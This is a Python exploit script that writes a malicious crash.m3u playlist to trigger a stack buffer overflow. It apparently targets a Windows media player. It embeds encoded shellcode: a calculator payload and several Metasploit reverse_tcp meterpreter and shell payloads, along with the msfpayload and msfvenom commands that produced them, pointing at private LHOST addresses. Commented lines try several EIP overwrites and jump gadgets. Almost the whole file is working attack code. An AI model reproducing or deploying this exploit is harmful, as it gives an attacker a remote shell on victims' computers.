from struct import *

# len 144		
calcCorelan = b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" + \
	b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" + \
	b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" + \
	b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" + \
	b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" + \
	b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" + \
	b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" + \
	b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" + \
	b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" + \
	b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" + \
	b"\x7f\xe8\x7b\xca"

#317 #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
meterpreter = b"\xda\xd5\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xd1\x89\x9d"+\
	b"\x27\xb1\x49\x31\x57\x19\x03\x57\x19\x83\xc7\x04\x33"+\
	b"\x7c\x61\xcf\x3a\x7f\x9a\x10\x5c\x09\x7f\x21\x4e\x6d"+\
	b"\x0b\x10\x5e\xe5\x59\x99\x15\xab\x49\x2a\x5b\x64\x7d"+\
	b"\x9b\xd1\x52\xb0\x1c\xd4\x5a\x1e\xde\x77\x27\x5d\x33"+\
	b"\x57\x16\xae\x46\x96\x5f\xd3\xa9\xca\x08\x9f\x18\xfa"+\
	b"\x3d\xdd\xa0\xfb\x91\x69\x98\x83\x94\xae\x6d\x39\x96"+\
	b"\xfe\xde\x36\xd0\xe6\x55\x10\xc1\x17\xb9\x43\x3d\x51"+\
	b"\xb6\xb7\xb5\x60\x1e\x86\x36\x53\x5e\x44\x09\x5b\x53"+\
	b"\x95\x4d\x5c\x8c\xe0\xa5\x9e\x31\xf2\x7d\xdc\xed\x77"+\
	b"\x60\x46\x65\x2f\x40\x76\xaa\xa9\x03\x74\x07\xbe\x4c"+\
	b"\x99\x96\x13\xe7\xa5\x13\x92\x28\x2c\x67\xb0\xec\x74"+\
	b"\x33\xd9\xb5\xd0\x92\xe6\xa6\xbd\x4b\x42\xac\x2c\x9f"+\
	b"\xf4\xef\x38\x6c\xca\x0f\xb9\xfa\x5d\x63\x8b\xa5\xf5"+\
	b"\xeb\xa7\x2e\xd3\xec\xc8\x04\xa3\x63\x37\xa7\xd3\xaa"+\
	b"\xfc\xf3\x83\xc4\xd5\x7b\x48\x15\xd9\xa9\xde\x45\x75"+\
	b"\x02\x9e\x35\x35\xf2\x76\x5c\xba\x2d\x66\x5f\x10\x46"+\
	b"\x0c\xa5\xf3\xa9\x78\xa5\x09\x42\x7a\xa6\x13\xf3\xf3"+\
	b"\x40\x41\xe3\x55\xda\xfe\x9a\xfc\x90\x9f\x63\x2b\xdd"+\
	b"\xa0\xe8\xdf\x21\x6e\x19\xaa\x31\x07\xe9\xe1\x68\x8e"+\
	b"\xf6\xdc\x07\x2f\x63\xda\x81\x78\x1b\xe0\xf4\x4f\x84"+\
	b"\x1b\xd3\xdb\x0d\x89\x9c\xb3\x71\x5d\x1d\x44\x24\x37"+\
	b"\x1d\x2c\x90\x63\x4e\x49\xdf\xbe\xe2\xc2\x4a\x40\x53"+\
	b"\xb6\xdd\x28\x59\xe1\x2a\xf7\xa2\xc4\xaa\xc4\x74\x21"+\
	b"\x29\x3c\xf3\x41\xf1"

#317 #msfpayload windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
shell = b"\xdd\xc1\xbb\xd3\xa3\x5c\x27\xd9\x74\x24\xf4\x58\x2b"+\
	b"\xc9\xb1\x49\x31\x58\x19\x03\x58\x19\x83\xc0\x04\x31"+\
	b"\x56\xa0\xcf\x3c\x99\x59\x10\x5e\x13\xbc\x21\x4c\x47"+\
	b"\xb4\x10\x40\x03\x98\x98\x2b\x41\x09\x2a\x59\x4e\x3e"+\
	b"\x9b\xd7\xa8\x71\x1c\xd6\x74\xdd\xde\x79\x09\x1c\x33"+\
	b"\x59\x30\xef\x46\x98\x75\x12\xa8\xc8\x2e\x58\x1b\xfc"+\
	b"\x5b\x1c\xa0\xfd\x8b\x2a\x98\x85\xae\xed\x6d\x3f\xb0"+\
	b"\x3d\xdd\x34\xfa\xa5\x55\x12\xdb\xd4\xba\x41\x27\x9e"+\
	b"\xb7\xb1\xd3\x21\x1e\x88\x1c\x10\x5e\x46\x23\x9c\x53"+\
	b"\x97\x63\x1b\x8c\xe2\x9f\x5f\x31\xf4\x5b\x1d\xed\x71"+\
	b"\x7e\x85\x66\x21\x5a\x37\xaa\xb7\x29\x3b\x07\xbc\x76"+\
	b"\x58\x96\x11\x0d\x64\x13\x94\xc2\xec\x67\xb2\xc6\xb5"+\
	b"\x3c\xdb\x5f\x10\x92\xe4\x80\xfc\x4b\x40\xca\xef\x98"+\
	b"\xf2\x91\x67\x6c\xc8\x29\x78\xfa\x5b\x59\x4a\xa5\xf7"+\
	b"\xf5\xe6\x2e\xd1\x02\x08\x05\xa5\x9d\xf7\xa6\xd5\xb4"+\
	b"\x33\xf2\x85\xae\x92\x7b\x4e\x2f\x1a\xae\xc0\x7f\xb4"+\
	b"\x01\xa0\x2f\x74\xf2\x48\x3a\x7b\x2d\x68\x45\x51\x46"+\
	b"\x02\xbf\x32\xa9\x7a\xbf\xc8\x41\x78\xc0\xd2\xf0\xf5"+\
	b"\x26\x80\xe2\x53\xf0\x3d\x9a\xfe\x8a\xdc\x63\xd5\xf6"+\
	b"\xdf\xe8\xd9\x07\x91\x18\x94\x1b\x46\xe9\xe3\x46\xc1"+\
	b"\xf6\xde\xed\xee\x62\xe4\xa7\xb9\x1a\xe6\x9e\x8e\x84"+\
	b"\x19\xf5\x84\x0d\x8f\xb6\xf2\x71\x5f\x37\x03\x24\x35"+\
	b"\x37\x6b\x90\x6d\x64\x8e\xdf\xb8\x18\x03\x4a\x42\x49"+\
	b"\xf7\xdd\x2a\x77\x2e\x29\xf5\x88\x05\xab\xca\x5e\x60"+\
	b"\x29\x3a\xd5\x80\xf1"
# 308   meterpreter reverse_tcp  
 #msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.74 lport=7777 -f python -e x86/shikata_ga_nai  -b '\x00\x09\x0d\xff\x0a'
buf =  b""
buf += b"\xda\xd8\xd9\x74\x24\xf4\x58\xbf\x73\x1f\x91\xcb\x29"
buf += b"\xc9\xb1\x47\x83\xe8\xfc\x31\x78\x14\x03\x78\x67\xfd"
buf += b"\x64\x37\x6f\x83\x87\xc8\x6f\xe4\x0e\x2d\x5e\x24\x74"
buf += b"\x25\xf0\x94\xfe\x6b\xfc\x5f\x52\x98\x77\x2d\x7b\xaf"
buf += b"\x30\x98\x5d\x9e\xc1\xb1\x9e\x81\x41\xc8\xf2\x61\x78"
buf += b"\x03\x07\x63\xbd\x7e\xea\x31\x16\xf4\x59\xa6\x13\x40"
buf += b"\x62\x4d\x6f\x44\xe2\xb2\x27\x67\xc3\x64\x3c\x3e\xc3"
buf += b"\x87\x91\x4a\x4a\x90\xf6\x77\x04\x2b\xcc\x0c\x97\xfd"
buf += b"\x1d\xec\x34\xc0\x92\x1f\x44\x04\x14\xc0\x33\x7c\x67"
buf += b"\x7d\x44\xbb\x1a\x59\xc1\x58\xbc\x2a\x71\x85\x3d\xfe"
buf += b"\xe4\x4e\x31\x4b\x62\x08\x55\x4a\xa7\x22\x61\xc7\x46"
buf += b"\xe5\xe0\x93\x6c\x21\xa9\x40\x0c\x70\x17\x26\x31\x62"
buf += b"\xf8\x97\x97\xe8\x14\xc3\xa5\xb2\x70\x20\x84\x4c\x80"
buf += b"\x2e\x9f\x3f\xb2\xf1\x0b\xa8\xfe\x7a\x92\x2f\x01\x51"
buf += b"\x62\xbf\xfc\x5a\x93\xe9\x3a\x0e\xc3\x81\xeb\x2f\x88"
buf += b"\x51\x14\xfa\x1f\x02\xba\x55\xe0\xf2\x7a\x06\x88\x18"
buf += b"\x75\x79\xa8\x22\x5c\x12\x43\xd8\x36\xdd\x3c\xe3\x8c"
buf += b"\xb5\x3e\xe4\x0e\x27\xb6\x02\x44\xb7\x9e\x9d\xf0\x2e"
buf += b"\xbb\x56\x61\xae\x11\x13\xa1\x24\x96\xe3\x6f\xcd\xd3"
buf += b"\xf7\x07\x3d\xae\xaa\x81\x42\x04\xc0\x2d\xd7\xa3\x43"
buf += b"\x7a\x4f\xae\xb2\x4c\xd0\x51\x91\xc7\xd9\xc7\x5a\xbf"
buf += b"\x25\x08\x5b\x3f\x70\x42\x5b\x57\x24\x36\x08\x42\x2b"
buf += b"\xe3\x3c\xdf\xbe\x0c\x15\x8c\x69\x65\x9b\xeb\x5e\x2a"
buf += b"\x64\xde\x5e\x16\xb3\x26\x15\x76\x07"

# len 144		

calcCorelan = b"\xdb\xc0"
calcCorelan += b"\x31\xc9"
#add = b"\x7c\x92\xc2\x45"
#calcCorelan += b'\x75\x13\x39\x7e'
calcCorelan += b"\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" + \
	b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" + \
	b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" + \
	b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" + \
	b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" + \
	b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" + \
	b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" + \
	b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" + \
	b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" + \
	b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" + \
	b"\x7f\xe8\x7b\xca"

crash = open("crash.m3u", "wb+")
junk = b'\xcc' * 25560 #26076     #26109 base
nop = b'\x90' * 196 #205 #196
pause = b'\xCC' * 4
futur = b'\x90' * 122;# 308;
eip = b'\x50\xFD\x10\x00' # 50 -> +400 544
crash.write(b'\x90' * 544 + b'\xcc' * 25532 + b'\x13\x22\x80\x7c')

#crash.write(b'\x90 + buf + nop + b'\x90'  * 11 + junk + eip)
#crash.write(b"\x90" * 880 + calcCorelan + b'\x90' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(b"\x90" * 650 + meterpreter + b'\xcc' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 4 + calcCorelan) # junk 26109 #overwrite EIP with call esp
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 12 + meterpreter) # junk 26109 #overwrite EIP with call esp
#crash.write(b'\x90'*156 + calcCorelan + b'\x90' * 25809 + b'\x5F\xDF\x87\x7C' + \
#b'XXXX' + b'\x90' * 8 + b'\x1B\x99\x80\x7C' + b'XXXX' + b'\x5F\xDF\x87\x7C' + b'XXXX' + b'\x90'*4 + b'\xC3\x43\x11\x00')
	#pop eax ret			b'\x1B\x99\x80\x7C'  #pop eax pop ebp ret	b'\x5F\xDF\x87\x7C'  #jmp esp 	b'\xC3\x43\x11\x00'
#crash.write( junk + b'\x39\x10\x9C\x7C' + b'XXXX' + b'\x90' * 8 + calcCorelan) # push esp ret
#crash.write(junk + b'\x2F\x92\x84\7C' +  pause) # JMP DWORD SS:ESP FF24E4

print("All OK")